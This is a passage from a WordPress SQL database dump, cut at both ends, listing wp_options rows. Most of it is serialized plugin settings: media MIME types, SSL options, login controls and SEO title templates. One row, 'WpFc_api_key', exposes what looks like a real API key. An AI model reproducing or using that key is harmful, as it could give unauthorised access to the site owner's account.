ndocument.formula\";s:8:\"singular\";s:42:\"application/vnd.oasis.opendocument.formula\";s:6:\"plural\";s:42:\"application/vnd.oasis.opendocument.formula\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:6:\"wp|wpd\";a:5:{s:4:\"mime\";s:23:\"application/wordperfect\";s:8:\"singular\";s:23:\"application/wordperfect\";s:6:\"plural\";s:23:\"application/wordperfect\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"key\";a:5:{s:4:\"mime\";s:29:\"application/vnd.apple.keynote\";s:8:\"singular\";s:29:\"application/vnd.apple.keynote\";s:6:\"plural\";s:29:\"application/vnd.apple.keynote\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:7:\"numbers\";a:5:{s:4:\"mime\";s:29:\"application/vnd.apple.numbers\";s:8:\"singular\";s:29:\"application/vnd.apple.numbers\";s:6:\"plural\";s:29:\"application/vnd.apple.numbers\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:5:\"pages\";a:5:{s:4:\"mime\";s:27:\"application/vnd.apple.pages\";s:8:\"singular\";s:27:\"application/vnd.apple.pages\";s:6:\"plural\";s:27:\"application/vnd.apple.pages\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}}','yes'),(39312,'wpuxss_eml_mimes_backup','a:92:{s:12:\"jpg|jpeg|jpe\";a:5:{s:4:\"mime\";s:10:\"image/jpeg\";s:8:\"singular\";s:10:\"image/jpeg\";s:6:\"plural\";s:10:\"image/jpeg\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"gif\";a:5:{s:4:\"mime\";s:9:\"image/gif\";s:8:\"singular\";s:9:\"image/gif\";s:6:\"plural\";s:9:\"image/gif\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"png\";a:5:{s:4:\"mime\";s:9:\"image/png\";s:8:\"singular\";s:9:\"image/png\";s:6:\"plural\";s:9:\"image/png\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"bmp\";a:5:{s:4:\"mime\";s:9:\"image/bmp\";s:8:\"singular\";s:9:\"image/bmp\";s:6:\"plural\";s:9:\"image/bmp\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:8:\"tiff|tif\";a:5:{s:4:\"mime\";s:10:\"image/tiff\";s:8:\"singular\";s:10:\"image/tiff\";s:6:\"plural\";s:10:\"image/tiff\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"ico\";a:5:{s:4:\"mime\";s:12:\"image/x-icon\";s:8:\"singular\";s:12:\"image/x-icon\";s:6:\"plural\";s:12:\"image/x-icon\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:7:\"asf|asx\";a:5:{s:4:\"mime\";s:14:\"video/x-ms-asf\";s:8:\"singular\";s:14:\"video/x-ms-asf\";s:6:\"plural\";s:14:\"video/x-ms-asf\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"wmv\";a:5:{s:4:\"mime\";s:14:\"video/x-ms-wmv\";s:8:\"singular\";s:14:\"video/x-ms-wmv\";s:6:\"plural\";s:14:\"video/x-ms-wmv\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"wmx\";a:5:{s:4:\"mime\";s:14:\"video/x-ms-wmx\";s:8:\"singular\";s:14:\"video/x-ms-wmx\";s:6:\"plural\";s:14:\"video/x-ms-wmx\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:2:\"wm\";a:5:{s:4:\"mime\";s:13:\"video/x-ms-wm\";s:8:\"singular\";s:13:\"video/x-ms-wm\";s:6:\"plural\";s:13:\"video/x-ms-wm\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"avi\";a:5:{s:4:\"mime\";s:9:\"video/avi\";s:8:\"singular\";s:9:\"video/avi\";s:6:\"plural\";s:9:\"video/avi\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:4:\"divx\";a:5:{s:4:\"mime\";s:10:\"video/divx\";s:8:\"singular\";s:10:\"video/divx\";s:6:\"plural\";s:10:\"video/divx\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"flv\";a:5:{s:4:\"mime\";s:11:\"video/x-flv\";s:8:\"singular\";s:11:\"video/x-flv\";s:6:\"plural\";s:11:\"video/x-flv\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:6:\"mov|qt\";a:5:{s:4:\"mime\";s:15:\"video/quicktime\";s:8:\"singular\";s:15:\"video/quicktime\";s:6:\"plural\";s:15:\"video/quicktime\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:12:\"mpeg|mpg|mpe\";a:5:{s:4:\"mime\";s:10:\"video/mpeg\";s:8:\"singular\";s:10:\"video/mpeg\";s:6:\"plural\";s:10:\"video/mpeg\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:7:\"mp4|m4v\";a:5:{s:4:\"mime\";s:9:\"video/mp4\";s:8:\"singular\";s:9:\"video/mp4\";s:6:\"plural\";s:9:\"video/mp4\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"ogv\";a:5:{s:4:\"mime\";s:9:\"video/ogg\";s:8:\"singular\";s:9:\"video/ogg\";s:6:\"plural\";s:9:\"video/ogg\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:4:\"webm\";a:5:{s:4:\"mime\";s:10:\"video/webm\";s:8:\"singular\";s:10:\"video/webm\";s:6:\"plural\";s:10:\"video/webm\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"mkv\";a:5:{s:4:\"mime\";s:16:\"video/x-matroska\";s:8:\"singular\";s:16:\"video/x-matroska\";s:6:\"plural\";s:16:\"video/x-matroska\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:8:\"3gp|3gpp\";a:5:{s:4:\"mime\";s:10:\"video/3gpp\";s:8:\"singular\";s:10:\"video/3gpp\";s:6:\"plural\";s:10:\"video/3gpp\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:8:\"3g2|3gp2\";a:5:{s:4:\"mime\";s:11:\"video/3gpp2\";s:8:\"singular\";s:11:\"video/3gpp2\";s:6:\"plural\";s:11:\"video/3gpp2\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:18:\"txt|asc|c|cc|h|srt\";a:5:{s:4:\"mime\";s:10:\"text/plain\";s:8:\"singular\";s:10:\"text/plain\";s:6:\"plural\";s:10:\"text/plain\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"csv\";a:5:{s:4:\"mime\";s:8:\"text/csv\";s:8:\"singular\";s:8:\"text/csv\";s:6:\"plural\";s:8:\"text/csv\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"tsv\";a:5:{s:4:\"mime\";s:25:\"text/tab-separated-values\";s:8:\"singular\";s:25:\"text/tab-separated-values\";s:6:\"plural\";s:25:\"text/tab-separated-values\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"ics\";a:5:{s:4:\"mime\";s:13:\"text/calendar\";s:8:\"singular\";s:13:\"text/calendar\";s:6:\"plural\";s:13:\"text/calendar\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"rtx\";a:5:{s:4:\"mime\";s:13:\"text/richtext\";s:8:\"singular\";s:13:\"text/richtext\";s:6:\"plural\";s:13:\"text/richtext\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"css\";a:5:{s:4:\"mime\";s:8:\"text/css\";s:8:\"singular\";s:8:\"text/css\";s:6:\"plural\";s:8:\"text/css\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:8:\"htm|html\";a:5:{s:4:\"mime\";s:9:\"text/html\";s:8:\"singular\";s:9:\"text/html\";s:6:\"plural\";s:9:\"text/html\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"vtt\";a:5:{s:4:\"mime\";s:8:\"text/vtt\";s:8:\"singular\";s:8:\"text/vtt\";s:6:\"plural\";s:8:\"text/vtt\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:4:\"dfxp\";a:5:{s:4:\"mime\";s:20:\"application/ttaf+xml\";s:8:\"singular\";s:20:\"application/ttaf+xml\";s:6:\"plural\";s:20:\"application/ttaf+xml\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:11:\"mp3|m4a|m4b\";a:5:{s:4:\"mime\";s:10:\"audio/mpeg\";s:8:\"singular\";s:10:\"audio/mpeg\";s:6:\"plural\";s:10:\"audio/mpeg\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"aac\";a:5:{s:4:\"mime\";s:9:\"audio/aac\";s:8:\"singular\";s:9:\"audio/aac\";s:6:\"plural\";s:9:\"audio/aac\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:6:\"ra|ram\";a:5:{s:4:\"mime\";s:17:\"audio/x-realaudio\";s:8:\"singular\";s:17:\"audio/x-realaudio\";s:6:\"plural\";s:17:\"audio/x-realaudio\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"wav\";a:5:{s:4:\"mime\";s:9:\"audio/wav\";s:8:\"singular\";s:9:\"audio/wav\";s:6:\"plural\";s:9:\"audio/wav\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:7:\"ogg|oga\";a:5:{s:4:\"mime\";s:9:\"audio/ogg\";s:8:\"singular\";s:9:\"audio/ogg\";s:6:\"plural\";s:9:\"audio/ogg\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:4:\"flac\";a:5:{s:4:\"mime\";s:10:\"audio/flac\";s:8:\"singular\";s:10:\"audio/flac\";s:6:\"plural\";s:10:\"audio/flac\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:8:\"mid|midi\";a:5:{s:4:\"mime\";s:10:\"audio/midi\";s:8:\"singular\";s:10:\"audio/midi\";s:6:\"plural\";s:10:\"audio/midi\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"wma\";a:5:{s:4:\"mime\";s:14:\"audio/x-ms-wma\";s:8:\"singular\";s:14:\"audio/x-ms-wma\";s:6:\"plural\";s:14:\"audio/x-ms-wma\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"wax\";a:5:{s:4:\"mime\";s:14:\"audio/x-ms-wax\";s:8:\"singular\";s:14:\"audio/x-ms-wax\";s:6:\"plural\";s:14:\"audio/x-ms-wax\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"mka\";a:5:{s:4:\"mime\";s:16:\"audio/x-matroska\";s:8:\"singular\";s:16:\"audio/x-matroska\";s:6:\"plural\";s:16:\"audio/x-matroska\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"rtf\";a:5:{s:4:\"mime\";s:15:\"application/rtf\";s:8:\"singular\";s:15:\"application/rtf\";s:6:\"plural\";s:15:\"application/rtf\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:2:\"js\";a:5:{s:4:\"mime\";s:22:\"application/javascript\";s:8:\"singular\";s:22:\"application/javascript\";s:6:\"plural\";s:22:\"application/javascript\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"pdf\";a:5:{s:4:\"mime\";s:15:\"application/pdf\";s:8:\"singular\";s:15:\"application/pdf\";s:6:\"plural\";s:15:\"application/pdf\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"swf\";a:5:{s:4:\"mime\";s:29:\"application/x-shockwave-flash\";s:8:\"singular\";s:29:\"application/x-shockwave-flash\";s:6:\"plural\";s:29:\"application/x-shockwave-flash\";s:6:\"filter\";i:0;s:6:\"upload\";i:0;}s:5:\"class\";a:5:{s:4:\"mime\";s:16:\"application/java\";s:8:\"singular\";s:16:\"application/java\";s:6:\"plural\";s:16:\"application/java\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"tar\";a:5:{s:4:\"mime\";s:17:\"application/x-tar\";s:8:\"singular\";s:17:\"application/x-tar\";s:6:\"plural\";s:17:\"application/x-tar\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"zip\";a:5:{s:4:\"mime\";s:15:\"application/zip\";s:8:\"singular\";s:15:\"application/zip\";s:6:\"plural\";s:15:\"application/zip\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:7:\"gz|gzip\";a:5:{s:4:\"mime\";s:18:\"application/x-gzip\";s:8:\"singular\";s:18:\"application/x-gzip\";s:6:\"plural\";s:18:\"application/x-gzip\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"rar\";a:5:{s:4:\"mime\";s:15:\"application/rar\";s:8:\"singular\";s:15:\"application/rar\";s:6:\"plural\";s:15:\"application/rar\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:2:\"7z\";a:5:{s:4:\"mime\";s:27:\"application/x-7z-compressed\";s:8:\"singular\";s:27:\"application/x-7z-compressed\";s:6:\"plural\";s:27:\"application/x-7z-compressed\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"exe\";a:5:{s:4:\"mime\";s:24:\"application/x-msdownload\";s:8:\"singular\";s:24:\"application/x-msdownload\";s:6:\"plural\";s:24:\"application/x-msdownload\";s:6:\"filter\";i:0;s:6:\"upload\";i:0;}s:3:\"psd\";a:5:{s:4:\"mime\";s:24:\"application/octet-stream\";s:8:\"singular\";s:24:\"application/octet-stream\";s:6:\"plural\";s:24:\"application/octet-stream\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"xcf\";a:5:{s:4:\"mime\";s:24:\"application/octet-stream\";s:8:\"singular\";s:24:\"application/octet-stream\";s:6:\"plural\";s:24:\"application/octet-stream\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"doc\";a:5:{s:4:\"mime\";s:18:\"application/msword\";s:8:\"singular\";s:18:\"application/msword\";s:6:\"plural\";s:18:\"application/msword\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:11:\"pot|pps|ppt\";a:5:{s:4:\"mime\";s:29:\"application/vnd.ms-powerpoint\";s:8:\"singular\";s:29:\"application/vnd.ms-powerpoint\";s:6:\"plural\";s:29:\"application/vnd.ms-powerpoint\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"wri\";a:5:{s:4:\"mime\";s:24:\"application/vnd.ms-write\";s:8:\"singular\";s:24:\"application/vnd.ms-write\";s:6:\"plural\";s:24:\"application/vnd.ms-write\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:15:\"xla|xls|xlt|xlw\";a:5:{s:4:\"mime\";s:24:\"application/vnd.ms-excel\";s:8:\"singular\";s:24:\"application/vnd.ms-excel\";s:6:\"plural\";s:24:\"application/vnd.ms-excel\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"mdb\";a:5:{s:4:\"mime\";s:25:\"application/vnd.ms-access\";s:8:\"singular\";s:25:\"application/vnd.ms-access\";s:6:\"plural\";s:25:\"application/vnd.ms-access\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"mpp\";a:5:{s:4:\"mime\";s:26:\"application/vnd.ms-project\";s:8:\"singular\";s:26:\"application/vnd.ms-project\";s:6:\"plural\";s:26:\"application/vnd.ms-project\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:4:\"docx\";a:5:{s:4:\"mime\";s:71:\"application/vnd.openxmlformats-officedocument.wordprocessingml.document\";s:8:\"singular\";s:71:\"application/vnd.openxmlformats-officedocument.wordprocessingml.document\";s:6:\"plural\";s:71:\"application/vnd.openxmlformats-officedocument.wordprocessingml.document\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:4:\"docm\";a:5:{s:4:\"mime\";s:48:\"application/vnd.ms-word.document.macroEnabled.12\";s:8:\"singular\";s:48:\"application/vnd.ms-word.document.macroEnabled.12\";s:6:\"plural\";s:48:\"application/vnd.ms-word.document.macroEnabled.12\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:4:\"dotx\";a:5:{s:4:\"mime\";s:71:\"application/vnd.openxmlformats-officedocument.wordprocessingml.template\";s:8:\"singular\";s:71:\"application/vnd.openxmlformats-officedocument.wordprocessingml.template\";s:6:\"plural\";s:71:\"application/vnd.openxmlformats-officedocument.wordprocessingml.template\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:4:\"dotm\";a:5:{s:4:\"mime\";s:48:\"application/vnd.ms-word.template.macroEnabled.12\";s:8:\"singular\";s:48:\"application/vnd.ms-word.template.macroEnabled.12\";s:6:\"plural\";s:48:\"application/vnd.ms-word.template.macroEnabled.12\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:4:\"xlsx\";a:5:{s:4:\"mime\";s:65:\"application/vnd.openxmlformats-officedocument.spreadsheetml.sheet\";s:8:\"singular\";s:65:\"application/vnd.openxmlformats-officedocument.spreadsheetml.sheet\";s:6:\"plural\";s:65:\"application/vnd.openxmlformats-officedocument.spreadsheetml.sheet\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:4:\"xlsm\";a:5:{s:4:\"mime\";s:46:\"application/vnd.ms-excel.sheet.macroEnabled.12\";s:8:\"singular\";s:46:\"application/vnd.ms-excel.sheet.macroEnabled.12\";s:6:\"plural\";s:46:\"application/vnd.ms-excel.sheet.macroEnabled.12\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:4:\"xlsb\";a:5:{s:4:\"mime\";s:53:\"application/vnd.ms-excel.sheet.binary.macroEnabled.12\";s:8:\"singular\";s:53:\"application/vnd.ms-excel.sheet.binary.macroEnabled.12\";s:6:\"plural\";s:53:\"application/vnd.ms-excel.sheet.binary.macroEnabled.12\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:4:\"xltx\";a:5:{s:4:\"mime\";s:68:\"application/vnd.openxmlformats-officedocument.spreadsheetml.template\";s:8:\"singular\";s:68:\"application/vnd.openxmlformats-officedocument.spreadsheetml.template\";s:6:\"plural\";s:68:\"application/vnd.openxmlformats-officedocument.spreadsheetml.template\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:4:\"xltm\";a:5:{s:4:\"mime\";s:49:\"application/vnd.ms-excel.template.macroEnabled.12\";s:8:\"singular\";s:49:\"application/vnd.ms-excel.template.macroEnabled.12\";s:6:\"plural\";s:49:\"application/vnd.ms-excel.template.macroEnabled.12\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:4:\"xlam\";a:5:{s:4:\"mime\";s:46:\"application/vnd.ms-excel.addin.macroEnabled.12\";s:8:\"singular\";s:46:\"application/vnd.ms-excel.addin.macroEnabled.12\";s:6:\"plural\";s:46:\"application/vnd.ms-excel.addin.macroEnabled.12\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:4:\"pptx\";a:5:{s:4:\"mime\";s:73:\"application/vnd.openxmlformats-officedocument.presentationml.presentation\";s:8:\"singular\";s:73:\"application/vnd.openxmlformats-officedocument.presentationml.presentation\";s:6:\"plural\";s:73:\"application/vnd.openxmlformats-officedocument.presentationml.presentation\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:4:\"pptm\";a:5:{s:4:\"mime\";s:58:\"application/vnd.ms-powerpoint.presentation.macroEnabled.12\";s:8:\"singular\";s:58:\"application/vnd.ms-powerpoint.presentation.macroEnabled.12\";s:6:\"plural\";s:58:\"application/vnd.ms-powerpoint.presentation.macroEnabled.12\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:4:\"ppsx\";a:5:{s:4:\"mime\";s:70:\"application/vnd.openxmlformats-officedocument.presentationml.slideshow\";s:8:\"singular\";s:70:\"application/vnd.openxmlformats-officedocument.presentationml.slideshow\";s:6:\"plural\";s:70:\"application/vnd.openxmlformats-officedocument.presentationml.slideshow\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:4:\"ppsm\";a:5:{s:4:\"mime\";s:55:\"application/vnd.ms-powerpoint.slideshow.macroEnabled.12\";s:8:\"singular\";s:55:\"application/vnd.ms-powerpoint.slideshow.macroEnabled.12\";s:6:\"plural\";s:55:\"application/vnd.ms-powerpoint.slideshow.macroEnabled.12\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:4:\"potx\";a:5:{s:4:\"mime\";s:69:\"application/vnd.openxmlformats-officedocument.presentationml.template\";s:8:\"singular\";s:69:\"application/vnd.openxmlformats-officedocument.presentationml.template\";s:6:\"plural\";s:69:\"application/vnd.openxmlformats-officedocument.presentationml.template\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:4:\"potm\";a:5:{s:4:\"mime\";s:54:\"application/vnd.ms-powerpoint.template.macroEnabled.12\";s:8:\"singular\";s:54:\"application/vnd.ms-powerpoint.template.macroEnabled.12\";s:6:\"plural\";s:54:\"application/vnd.ms-powerpoint.template.macroEnabled.12\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:4:\"ppam\";a:5:{s:4:\"mime\";s:51:\"application/vnd.ms-powerpoint.addin.macroEnabled.12\";s:8:\"singular\";s:51:\"application/vnd.ms-powerpoint.addin.macroEnabled.12\";s:6:\"plural\";s:51:\"application/vnd.ms-powerpoint.addin.macroEnabled.12\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:4:\"sldx\";a:5:{s:4:\"mime\";s:66:\"application/vnd.openxmlformats-officedocument.presentationml.slide\";s:8:\"singular\";s:66:\"application/vnd.openxmlformats-officedocument.presentationml.slide\";s:6:\"plural\";s:66:\"application/vnd.openxmlformats-officedocument.presentationml.slide\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:4:\"sldm\";a:5:{s:4:\"mime\";s:51:\"application/vnd.ms-powerpoint.slide.macroEnabled.12\";s:8:\"singular\";s:51:\"application/vnd.ms-powerpoint.slide.macroEnabled.12\";s:6:\"plural\";s:51:\"application/vnd.ms-powerpoint.slide.macroEnabled.12\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:28:\"onetoc|onetoc2|onetmp|onepkg\";a:5:{s:4:\"mime\";s:19:\"application/onenote\";s:8:\"singular\";s:19:\"application/onenote\";s:6:\"plural\";s:19:\"application/onenote\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:4:\"oxps\";a:5:{s:4:\"mime\";s:16:\"application/oxps\";s:8:\"singular\";s:16:\"application/oxps\";s:6:\"plural\";s:16:\"application/oxps\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"xps\";a:5:{s:4:\"mime\";s:30:\"application/vnd.ms-xpsdocument\";s:8:\"singular\";s:30:\"application/vnd.ms-xpsdocument\";s:6:\"plural\";s:30:\"application/vnd.ms-xpsdocument\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"odt\";a:5:{s:4:\"mime\";s:39:\"application/vnd.oasis.opendocument.text\";s:8:\"singular\";s:39:\"application/vnd.oasis.opendocument.text\";s:6:\"plural\";s:39:\"application/vnd.oasis.opendocument.text\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"odp\";a:5:{s:4:\"mime\";s:47:\"application/vnd.oasis.opendocument.presentation\";s:8:\"singular\";s:47:\"application/vnd.oasis.opendocument.presentation\";s:6:\"plural\";s:47:\"application/vnd.oasis.opendocument.presentation\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"ods\";a:5:{s:4:\"mime\";s:46:\"application/vnd.oasis.opendocument.spreadsheet\";s:8:\"singular\";s:46:\"application/vnd.oasis.opendocument.spreadsheet\";s:6:\"plural\";s:46:\"application/vnd.oasis.opendocument.spreadsheet\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"odg\";a:5:{s:4:\"mime\";s:43:\"application/vnd.oasis.opendocument.graphics\";s:8:\"singular\";s:43:\"application/vnd.oasis.opendocument.graphics\";s:6:\"plural\";s:43:\"application/vnd.oasis.opendocument.graphics\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"odc\";a:5:{s:4:\"mime\";s:40:\"application/vnd.oasis.opendocument.chart\";s:8:\"singular\";s:40:\"application/vnd.oasis.opendocument.chart\";s:6:\"plural\";s:40:\"application/vnd.oasis.opendocument.chart\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"odb\";a:5:{s:4:\"mime\";s:43:\"application/vnd.oasis.opendocument.database\";s:8:\"singular\";s:43:\"application/vnd.oasis.opendocument.database\";s:6:\"plural\";s:43:\"application/vnd.oasis.opendocument.database\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"odf\";a:5:{s:4:\"mime\";s:42:\"application/vnd.oasis.opendocument.formula\";s:8:\"singular\";s:42:\"application/vnd.oasis.opendocument.formula\";s:6:\"plural\";s:42:\"application/vnd.oasis.opendocument.formula\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:6:\"wp|wpd\";a:5:{s:4:\"mime\";s:23:\"application/wordperfect\";s:8:\"singular\";s:23:\"application/wordperfect\";s:6:\"plural\";s:23:\"application/wordperfect\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:3:\"key\";a:5:{s:4:\"mime\";s:29:\"application/vnd.apple.keynote\";s:8:\"singular\";s:29:\"application/vnd.apple.keynote\";s:6:\"plural\";s:29:\"application/vnd.apple.keynote\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:7:\"numbers\";a:5:{s:4:\"mime\";s:29:\"application/vnd.apple.numbers\";s:8:\"singular\";s:29:\"application/vnd.apple.numbers\";s:6:\"plural\";s:29:\"application/vnd.apple.numbers\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}s:5:\"pages\";a:5:{s:4:\"mime\";s:27:\"application/vnd.apple.pages\";s:8:\"singular\";s:27:\"application/vnd.apple.pages\";s:6:\"plural\";s:27:\"application/vnd.apple.pages\";s:6:\"filter\";i:0;s:6:\"upload\";i:1;}}','no'),(39313,'wpuxss_eml_version','2.7.2','yes'),(39315,'passster_admin_notice_shown','on','yes'),(40692,'WpFc_api_key','8f7095e9f3699edcbe5abb2da3e476fb','yes'),(40830,'c2c_remember_me_controls','a:5:{s:16:\"auto_remember_me\";s:0:\"\";s:19:\"remember_me_forever\";s:0:\"\";s:20:\"remember_me_duration\";s:0:\"\";s:19:\"disable_remember_me\";s:1:\"1\";s:8:\"_version\";s:5:\"2.0.1\";}','yes'),(44892,'media_category_children','a:0:{}','yes'),(46157,'nf_sub_expiration','a:0:{}','yes'),(48451,'rlrsssl_options','a:16:{s:12:\"site_has_ssl\";b:1;s:4:\"hsts\";b:0;s:22:\"htaccess_warning_shown\";b:0;s:19:\"review_notice_shown\";b:1;s:25:\"ssl_success_message_shown\";b:0;s:26:\"autoreplace_insecure_links\";b:1;s:17:\"plugin_db_version\";s:5:\"5.3.5\";s:20:\"do_not_edit_htaccess\";b:0;s:17:\"htaccess_redirect\";b:0;s:11:\"ssl_enabled\";b:1;s:19:\"javascript_redirect\";b:0;s:11:\"wp_redirect\";b:1;s:31:\"switch_mixed_content_fixer_hook\";b:0;s:19:\"dismiss_all_notices\";b:0;s:13:\"high_contrast\";b:0;s:21:\"dismiss_review_notice\";b:0;}','yes'),(48459,'rsssl_activation_timestamp','1654012941','yes'),(48484,'wpseo','a:20:{s:15:\"ms_defaults_set\";b:0;s:7:\"version\";s:4:\"11.8\";s:20:\"disableadvanced_meta\";b:1;s:19:\"onpage_indexability\";b:1;s:11:\"baiduverify\";s:0:\"\";s:12:\"googleverify\";s:0:\"\";s:8:\"msverify\";s:0:\"\";s:12:\"yandexverify\";s:0:\"\";s:9:\"site_type\";s:0:\"\";s:20:\"has_multiple_authors\";s:0:\"\";s:16:\"environment_type\";s:0:\"\";s:23:\"content_analysis_active\";b:1;s:23:\"keyword_analysis_active\";b:1;s:21:\"enable_admin_bar_menu\";b:1;s:26:\"enable_cornerstone_content\";b:1;s:18:\"enable_xml_sitemap\";b:1;s:24:\"enable_text_link_counter\";b:1;s:22:\"show_onboarding_notice\";b:1;s:18:\"first_activated_on\";i:1565309875;s:13:\"myyoast-oauth\";b:0;}','yes'),(48485,'wpseo_titles','a:120:{s:10:\"title_test\";i:0;s:17:\"forcerewritetitle\";b:0;s:9:\"separator\";s:7:\"sc-dash\";s:16:\"title-home-wpseo\";s:42:\"%%sitename%% %%page%% %%sep%% %%sitedesc%%\";s:18:\"title-author-wpseo\";s:41:\"%%name%%, Author at %%sitename%% %%page%%\";s:19:\"title-archive-wpseo\";s:38:\"%%date%% %%page%% %%sep%% %%sitename%%\";s:18:\"title-search-wpseo\";s:63:\"You searched for %%searchphrase%% %%page%% %%sep%% %%sitename%%\";s:15:\"title-404-wpseo\";s:35:\"Page not found %%sep%% %%sitename%%\";s:19:\"metadesc-home-wpseo\";s:0:\"\";s:21:\"metadesc-author-wpseo\";s:0:\"\";s:22:\"metadesc-archive-wpseo\";s:0:\"\";s:9:\"rssbefore\";s:0:\"\";s:8:\"rssafter\";s:53:\"The post %%POSTLINK%% appeared first on %%BLOGLINK%%.\";s:20:\"noindex-author-wpseo\";b:0;s:28:\"noindex-author-noposts-wpseo\";b:1;s:21:\"noindex-archive-wpseo\";b:1;s:14:\"disable-author\";b:0;s:12:\"disable-date\";b:0;s:19:\"disable-post_format\";b:0;s:18:\"disable-attachment\";b:1;s:23:\"is-media-purge-relevant\";b:0;s:20:\"breadcrumbs-404crumb\";s:25:\"Error 404: Page not found\";s:29:\"breadcrumbs-display-blog-page\";b:1;s:20:\"breadcrumbs-boldlast\";b:0;s:25:\"breadcrumbs-archiveprefix\";s:12:\"Archives for\";s:18:\"breadcrumbs-enable\";b:0;s:16:\"breadcrumbs-home\";s:4:\"Home\";s:18:\"breadcrumbs-prefix\";s:0:\"\";s:24:\"breadcrumbs-searchprefix\";s:16:\"You searched 